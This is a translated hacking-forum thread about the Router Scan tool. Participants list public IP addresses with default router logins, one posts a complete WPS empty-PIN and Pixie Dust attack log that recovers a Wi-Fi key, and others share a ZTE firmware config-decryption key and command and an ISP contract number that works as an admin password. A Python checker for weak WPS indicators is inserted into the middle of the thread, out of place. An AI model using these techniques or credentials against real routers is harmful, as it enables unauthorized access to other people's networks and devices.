The Router Scan program

Discussion in 'Wireless technologies/Wi-Fi/Wardriving' started by СЕРЖ32, 11 Nov 2013.

  1. СЕРЖ32

    СЕРЖ32 Active Member

    Yes... I'm here, I'm just keeping an eye on you))
     
  2. СЕРЖ32

    СЕРЖ32 Active Member

    Well, if port 80 is disabled on the access point, what's the point of scanning then... or can this router be detected on some other ports?
     
  3. binarymaster

    binarymaster Elder

    Sometimes on other ports: 8080, 1080, 161.

    But it also happens that access from the WAN is closed altogether.
     
  4. СЕРЖ32

    СЕРЖ32 Active Member

    Well, 80, 8080 and 1080 are already entered on my side, 161 isn't. What kind of port is that anyway, it's not a web interface...
     
  5. russstand

    russstand Banned

    This is the reply I get :(
     
  6. binarymaster

    binarymaster Elder

    Web interfaces do show up there, as practice shows.
    Well, it's all logical:

    https://forum.antichat.ru/posts/4143320 (reply 5)
     
  7. gurgen1

    gurgen1 Member

  8. Pebenok70

    Pebenok70 Member

    31.181.99.197:80 super:super doesn't parse. It returns super:super:1K6ACAEO Realtek (QTECH QBR-1), or Seems to be Realtek Wireless Access Point, without authorization.
    Don't you need an Archer C60 sample? Its firmware is the same as the C59, which has already been added.
     
    #4828 Pebenok70, 1 Nov 2017
    Last edited: 1 Nov 2017
  9. Veil

    Veil Banned

    What "crafty" kid users there are.
    Thinks he can hide from RouterScan?
    Nope, you won't get away. Come on now, get over here.

    And that's at least some use from the Avira antivirus VPN with its 500 MB
     
  10. alaa ali

    alaa ali New Member

    Hello world,
    I want to add a list of ips : ports to routerscan
    example:
    127.0.0.1:80
    127.0.0.2:779
    127.0.0.3:999
    I have many ports, please help me
     
  11. Kakoluk

    Kakoluk Banned

    Please add a MAC that is vulnerable to the empty pin.
    ESSID: MTSRouter_4971D2
    BSSID:
    Code:
    94:A7:B7:49:71:D2
    Code:
    [*] Audit started.
    [*] Associating with AP...
    [+] Associated successfully.
    [*] Trying pin "00000000"...
    [*] Sending EAPOL Start...
    [*] Received Identity Request.
    [*] Sending Identity Response...
    [*] Received WPS Message M1.
    [*] Manufacturer: ZTE Corporation
    [*] Model Name: ZXHN H298N
    [*] Model Number: ZXHN H298N
    [*] Serial Number: 123456789012347
    [*] Device Name: ADSL Modem/Router
    [*] Sending WPS Message M2...
    [*] Received WPS Message M3.
    [*] This AP is potentially vulnerable to the "empty string" pin.
    [*] To specify <empty> pin, add empty line to PINs list and disable checksum calculation.
    [*] Also in this case the pin can have two same halfs (e.g. 00000000).
    [*] Sending WPS Message M4...
    [*] Received WPS Message M5.
    [+] First half found: 0000
    [*] Sending WPS Message M6...
    [*] Received WPS Message M5.
    [*] Sending WPS Message M6...
    [*] Received WPS Message M5.
    [*] Sending WPS Message M6...
    [-] Request timed out.
    [*] Sending WPS Message M6...
    [*] Audit stopped.
    [*] Audit started.
    [*] Associating with AP...
    [+] Associated successfully.
    [*] Skipping pin "" (wrong first half)
    [*] Trying pin "12345670"...
    [*] Sending EAPOL Start...
    [*] Received Identity Request.
    [*] Sending Identity Response...
    [*] Received WPS Message M1.
    [*] E-Nonce: 0FF797195E62796710FF59DD4232C3CD
    [*] PKE: D0141B15656E96B85FCEAD2E8E76330D2B1AC1576BB026E7A328C0E1BAF8CF91664371174C08EE12EC92B0519C54879F21255BE5A8770E1FA1880470EF423C90E34D7847A6FCB4924563D1AF1DB0C481EAD9852C519BF1DD429C163951CF69181B132AEA2A3684CAF35BC54ACA1B20C88BB3B7339FF7D56E09139D77F0AC58079097938251DBBE75E86715CC6B7C0CA945FA8DD8D661BEB73B414032798DADEE32B5DD61BF105F18D89217760B75C5D966A5A490472CEBA9E3B4224F3D89FB2B
    [*] Manufacturer: ZTE Corporation
    [*] Model Name: ZXHN H298N
    [*] Model Number: ZXHN H298N
    [*] Serial Number: 123456789012347
    [*] Device Name: ADSL Modem/Router
    [*] Sending WPS Message M2...
    [*] R-Nonce: 04C05DB3C6691D0E4956EA99081E638D
    [*] PKR: 4BF226590448CBD43450681867CD706FE19E156B04502F61290DC1192DA8038226D48B36019B486340499E1BCF498AE039F0CFE8DB736B62EC603F4FB18F33481FB1E0EF6BC7520146B1DC709CD93A5E886524B1F2E5C7C4A6BBA7C19763DC47C51DF6CE9B0619C1AD10B65221BF5878FCD186321F7C36D50D17810E93352167083DB63AC61E3FF779FC0A98C5BD370C4D83CBBFDD775471C6953278C4868993A83D28A64E69F4D6A7626904F034F64306943AD67FCC74FEDFAD1E2D10C42B4B
    [*] AuthKey: EBF1376FA22F3B8963235679817DDE15C0D21169F78E4B8336F6EBE6DBDE2003
    [*] Received WPS Message M3.
    [*] E-Hash1: BC62A23513BA75068D49FF724298FD56066F21A2DB64897AD675A53F6744CC9A
    [*] E-Hash2: BC62A23513BA75068D49FF724298FD56066F21A2DB64897AD675A53F6744CC9A
    [*] Sending WPS Message M4...
    [*] Received WPS Message M5.
    [+] First half found: 1234
    [*] Sending WPS Message M6...
    [*] Received WPS Message M5.
    [*] Sending WPS Message M6...
    [*] Received WPS Message M5.
    [*] Sending WPS Message M6...
    [-] Request timed out.
    [*] Sending WPS Message M6...
    [*] Received Identity Request.
    [-] Request timed out.
    [*] Sending WPS Message M6...
    [*] Received Identity Request.
    [-] Session timed out.
    [*] Starting Pixie Dust attack...
    [*] Mode: 3 (RTL819x)
    [*] PSK1: 97FC09F3DC0F2CBEAA59BFCCA4E98902
    [*] PSK2: 422D7C5B3D86D90EE5A9BB1BFEC4C19F
    [*] E-S1: 0FF797195E62796710FF59DD4232C3CD
    [*] E-S2: 0FF797195E62796710FF59DD4232C3CD
    [+] WPS PIN: <empty>
    [*] Reconnecting...
    [*] Associating with AP...
    [+] Associated successfully.
    [*] Trying pin ""...
    [*] Sending EAPOL Start...
    [*] Received Identity Request.
    [*] Sending Identity Response...
    [*] Received Identity Request.
    [*] Sending Identity Response...
    [*] Received WPS Message M1.
    [*] E-Nonce: 690A2B5316A0E61B45D4FCD5127CF1F3
    [*] PKE: D0141B15656E96B85FCEAD2E8E76330D2B1AC1576BB026E7A328C0E1BAF8CF91664371174C08EE12EC92B0519C54879F21255BE5A8770E1FA1880470EF423C90E34D7847A6FCB4924563D1AF1DB0C481EAD9852C519BF1DD429C163951CF69181B132AEA2A3684CAF35BC54ACA1B20C88BB3B7339FF7D56E09139D77F0AC58079097938251DBBE75E86715CC6B7C0CA945FA8DD8D661BEB73B414032798DADEE32B5DD61BF105F18D89217760B75C5D966A5A490472CEBA9E3B4224F3D89FB2B
    [*] Sending WPS Message M2...
    [*] R-Nonce: C6FB90173F7B221CC91DA3A396E0E9A4
    [*] PKR: 200B2F3C19FDFFB0FC39A5FF7693AA64DA61DB5763CA23C5ABA856E4AB0CD832A1922D327A3F6F3A54E02984A17C2BE3965F01C90E8E3E80A28E3D3E448AEFB604E6B295304A8DEDADA185410E6066C8C96E93EC2EE95B491485086EF1BF3B51474A2AF7AD05FBD2269AB879378BF3402446F9347607D96E20452ADFBBF80EBC58E177AA2D8A9DAF4C267C55C876B9E28C0D6105928A86F30F1E36A10877D7D7515165616AD3C481F609B6DA9803ED103A3FD6CCB714A8B09325849FB1C580FD
    [*] AuthKey: E0B5926E675130CFDD8301B92DFC646981BD94171188716B39A545C8E119C2F9
    [*] Received WPS Message M1.
    [*] E-Nonce: 690A2B5316A0E61B45D4FCD5127CF1F3
    [*] PKE: D0141B15656E96B85FCEAD2E8E76330D2B1AC1576BB026E7A328C0E1BAF8CF91664371174C08EE12EC92B0519C54879F21255BE5A8770E1FA1880470EF423C90E34D7847A6FCB4924563D1AF1DB0C481EAD9852C519BF1DD429C163951CF69181B132AEA2A3684CAF35BC54ACA1B20C88BB3B7339FF7D56E09139D77F0AC58079097938251DBBE75E86715CC6B7C0CA945FA8DD8D661BEB73B414032798DADEE32B5DD61BF105F18D89217760B75C5D966A5A490472CEBA9E3B4224F3D89FB2B
    [*] Sending WPS Message M2...
    [*] R-Nonce: C6FB90173F7B221CC91DA3A396E0E9A4
    [*] PKR: 200B2F3C19FDFFB0FC39A5FF7693AA64DA61DB5763CA23C5ABA856E4AB0CD832A1922D327A3F6F3A54E02984A17C2BE3965F01C90E8E3E80A28E3D3E448AEFB604E6B295304A8DEDADA185410E6066C8C96E93EC2EE95B491485086EF1BF3B51474A2AF7AD05FBD2269AB879378BF3402446F9347607D96E20452ADFBBF80EBC58E177AA2D8A9DAF4C267C55C876B9E28C0D6105928A86F30F1E36A10877D7D7515165616AD3C481F609B6DA9803ED103A3FD6CCB714A8B09325849FB1C580FD
    [*] AuthKey: E0B5926E675130CFDD8301B92DFC646981BD94171188716B39A545C8E119C2F9
    [*] Received WPS Message M3.
    [*] E-Hash1: D9A4A73158C4CF708D01A5491993D6B78A8EE5F1516EAAABE339BD7B828E7C69
    [*] E-Hash2: D9A4A73158C4CF708D01A5491993D6B78A8EE5F1516EAAABE339BD7B828E7C69
    [*] Sending WPS Message M4...
    [*] Received WPS Message M5.
    [+] First half found: <empty>
    [*] Sending WPS Message M6...
    [*] Received WPS Message M7.
    [*] Sending WSC NACK...
    [*] Received Identity Request.
    [-] Request timed out.
    [*] Sending WSC NACK...
    [*] Received Identity Request.
    [-] Request timed out.
    [*] Sending WSC NACK...
    [*] Received Identity Request.
    [-] Session timed out.
    [+] WPS PIN: <empty>
    [+] SSID: MTSRouter_4971D2
    [+] Key: v5h3pruu
    [+] Key Index: 1
    [*] Audit stopped.
    
    I messed things up a bit while experimenting.
    Could you add the MAC of the device being audited to the log? :)
    Sometimes in the rush (when there are many devices in progress) you can forget to save it (the MAC).
     
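The audit log above declares the AP "potentially vulnerable to the empty string pin" right after M3 arrives, and the Pixie Dust stage reports "Mode: 3 (RTL819x)". The checker below is an added example, not part of the post or of Router Scan; it reads the log fields the registrar receives and explains both verdicts: E-Hash1 equal to E-Hash2 (both PIN halves hashed from identical secret inputs, which is what two empty halves plus a reused nonce produce) and E-S1/E-S2 equal to the public E-Nonce (the Realtek nonce-reuse weakness). The log excerpt is constructed from the values quoted in the post.

```python
import re

# Constructed excerpt of the audit log quoted above (only the fields the
# checker needs; values copied from the post).
SAMPLE_LOG = """\
[*] E-Nonce: 0FF797195E62796710FF59DD4232C3CD
[*] Received WPS Message M3.
[*] E-Hash1: BC62A23513BA75068D49FF724298FD56066F21A2DB64897AD675A53F6744CC9A
[*] E-Hash2: BC62A23513BA75068D49FF724298FD56066F21A2DB64897AD675A53F6744CC9A
[*] Starting Pixie Dust attack...
[*] Mode: 3 (RTL819x)
[*] E-S1: 0FF797195E62796710FF59DD4232C3CD
[*] E-S2: 0FF797195E62796710FF59DD4232C3CD
"""

# One "[*] Name: HEX" line of the audit log.
FIELD_RE = re.compile(r"^\[\*\] (E-Nonce|E-Hash1|E-Hash2|E-S1|E-S2): ([0-9A-Fa-f]+)\s*$")


def parse_fields(log: str) -> dict:
    """Collect the last value seen for each hex field in one audit run."""
    fields = {}
    for line in log.splitlines():
        m = FIELD_RE.match(line.strip())
        if m:
            fields[m.group(1)] = m.group(2).upper()
    return fields


def weak_wps_indicators(log: str) -> list:
    """Name the WPS weaknesses visible in the registrar-side log."""
    f = parse_fields(log)
    findings = []
    # E-Hash1 = HMAC(AuthKey, E-S1 || PSK1 || PKE || PKR); E-Hash2 is the same
    # with E-S2 and PSK2. Identical hashes mean the enrollee fed identical
    # secrets for both halves, consistent with an empty PIN (two empty halves).
    if "E-Hash1" in f and f["E-Hash1"] == f.get("E-Hash2"):
        findings.append("identical E-Hash1/E-Hash2")
    # E-S1 and E-S2 must be fresh random 128-bit secrets. Reusing one value,
    # and in particular the public E-Nonce, is the RTL819x flaw that lets the
    # registrar recover the PIN offline (Pixie Dust mode 3).
    if "E-S1" in f and f["E-S1"] == f.get("E-S2"):
        findings.append("E-S1 reused as E-S2")
        if f["E-S1"] == f.get("E-Nonce"):
            findings.append("E-S1/E-S2 equal the public E-Nonce")
    return findings
```

An AP with a proper WPS implementation yields distinct E-Hash values and E-S1/E-S2 that match neither each other nor E-Nonce, so the function returns an empty list for it.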
  12. Pebenok70

    Pebenok70 Member

    FAST Wireless N Router FWR310 178.237.183.87:80 admin:admin doesn't parse for me. Please check.
     
  13. LolipopR

    LolipopR New Member

    I do everything exactly as described, but for some reason it comes out like this.

    [*] Trying pin "00000000"...
     
  14. CRACK211

    CRACK211 Elder

    In the PinS window, create an empty line. Just press Enter.
     
  15. LolipopR

    LolipopR New Member

    I did, it doesn't help.
     
  16. Kozloff73

    Kozloff73 Member

  17. LolipopR

    LolipopR New Member

  18. Kakoluk

    Kakoluk Banned

    Grabbed the config from a ZTE ZXHN H298N (the new MTS SIP routers), hardware: 1.7, firmware: 1.1.6_MTS2T1 (the very one that is vulnerable to the empty pin).
    From the user account (the admin one is unknown, but apparently exists) https://yadi.sk/d/H-VLirv13PNDxS.
    Big request(!): take a look at what can be decrypted.
    Of the 3 accessible ones, I managed to log in to only one interface (default user:user).
    From inside (LAN) it parses partially (Use credentials).
    In this form:
    Code:
    "192.168.1.1";"80";"0";"Done";"user:user";"ZTE ZXHN H298N, hardware: 1.7, firmware: 1.1.6_MTS2T1";"";"";"98:13:33:4C:E6:B4";"MTSRouter_4CE6B4";"WPA2";"qt9buchk";"";"192.168.1.1";"255.255.255.0";"";"";"";"";"";"";""
    A port scan of the device from the WAN (even from the local pool, same provider, same range) gave nothing but ICMP.
     
  19. Felis-Sapiens

    Felis-Sapiens Reservists Of Antichat

    http://rgho.st/6l5gKsTgy

    Fixed the decryption script, since the firmware has a bug: the key "Wj%2$CjM" is passed to the sprintf function, which treats "%2$C" as a format specifier
    Code:
    ./decode_zte_config.py config.bin config.xml --key Wj
     
  20. Kakoluk

    Kakoluk Banned

    Checked on the routers available to me: the user:user account is enabled on only one (apparently the unit was reset),
    and on that same one admin:30701088627 works (superuser, with all rights), the contract number. :confused:
    From outside they don't respond to probing (from the LAN side only 80 and 443 and 23), you can't get in (without knowing the contract). Damn, it's armoured. Well, at least WPS is a sieve.
     
    #4840 Kakoluk, 3 Nov 2017
    Last edited: 28 Nov 2017